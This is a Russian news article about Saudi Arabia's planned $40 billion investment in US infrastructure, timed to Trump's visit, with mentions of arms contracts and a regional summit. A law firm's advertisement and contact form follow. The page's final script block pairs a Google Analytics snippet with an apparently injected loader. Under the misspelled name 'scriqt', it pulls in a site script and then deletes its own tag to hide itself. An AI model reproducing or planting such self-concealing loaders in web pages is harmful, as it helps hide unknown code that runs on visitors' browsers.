Саудовская Аравия вложит $40 млрд в экономику США.

Саудовская Аравия вложит $40 млрд в экономику США. Саудовская Аравия вложит $40 млрд в экономику США.

Саудовская Аравия намерена на следующей неделе объявить о плане инвестировать $40 млрд в инфраструктуру США, сообщает Bloomberg со ссылкой на источник. По его словам, решение уже принято, и анонсирование приурочено к визиту президента США Дональда Трампа в королевство, однако обнародование все еще может быть отложено.

Так Саудовская Аравия планирует перезапустить отношения с новой администрацией США после сложностей с предыдущей администрацией президента США Барака Обамы, которая в 2015 году подписала ядерное соглашение с противником королевства — Ираном.

В марте Дональд Трамп объявил о создании новой совместной программы двух стран в области энергетики, производства, инфраструктуры и технологий. На ее реализацию потребуется около $200 млрд прямых и косвенных инвестиций в течение следующих четырех лет, заявлял Белый дом.

Как сообщал «Ъ», в преддверии визита президента США Дональда Трампа в Саудовскую Аравию Вашингтон готовит контракты на поставку этой арабской стране вооружений на десятки миллиардов долларов. Обсуждаются поставки системы ПРО THAAD, программного обеспечения для осуществления управления и коммуникации в зоне военных действий, а также различных типов боеприпасов и бомб, а также контракт на четыре боевых корабля на сумму около $11,5 млрд.

Напомним, Дональд Трамп в ходе визита в Саудовскую Аравию намерен встретится с рядом лидеров арабских государств, которые прибудут в королевство на саммит. Король Саудовской Аравии Салман бен Абдель Азиз ас-Сауд направил приглашения для участия в этом саммите палестинскому лидеру Махмуду Аббасу, королю Иордании Абдалле II, президенту Алжира Абдельазизу Бутефлике, президенту Нигера Махамаду Исуфу. В своем первом зарубежном турне на посту президента Дональда Трамп также посетит Израиль, Палестину и Италию. Затем он отправится в Брюссель на саммит НАТО, потом — на Сицилию на встречу лидеров «Большой семерки».

Ранее глава Пентагона Джеймс Мэттис совершил поездку на Ближний Восток, которую начал с Саудовской Аравии. Приоритетом этого регионального турне стало новое сдерживание Ирана, обвиняемого в поддержке международного терроризма и подрывных действиях в Сирии, Йемене и других государствах Ближнего Востока.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');